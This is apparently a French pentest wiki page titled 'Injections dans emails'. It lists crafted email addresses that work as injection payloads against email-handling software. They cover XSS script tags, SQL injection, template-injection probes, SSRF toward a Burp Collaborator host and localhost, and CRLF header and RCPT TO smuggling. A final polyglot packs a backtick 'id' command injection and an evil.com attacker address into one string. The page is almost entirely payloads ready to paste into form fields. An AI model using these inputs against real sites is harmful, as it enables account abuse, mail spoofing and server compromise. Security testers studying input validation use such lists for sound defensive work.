💌Injections dans emails

XSS

test+(<script>alert(document.domain)</script>)@mail.xyz
test@mail(<script>alert(document.domain)</script>).xyz
"<script>alert(document.domain)</script>"@mail.xyz
"hello<form/><!><details/open/ontoggle=alert(1)>"@mail.xyz
["');alert('XSS');//"]@mail.xyz

SQLi

"'OR 1=1--'"@mail.xyz

SSTI

"<%=7*7 %>"@mail.xyz
test+(${{7*7}})@mail.xyz
test+${{7*7}}@mail.xyz

SSRF

test@mail.xyz.burpcollab.net
test@[127.0.0.1]

Header injection

"%0D%0AContent-Length:%200%0D%0A%OD%0A"@mail.xyz
"test@mail.xyz>\r\nRCPT TO:<victim+"@mail.xyz

Autres

<attacker@evil.com>toto@victim.com
username+${7*7}{{7*7}}`id`|'or''='mail.xyz

Dernière mise à jour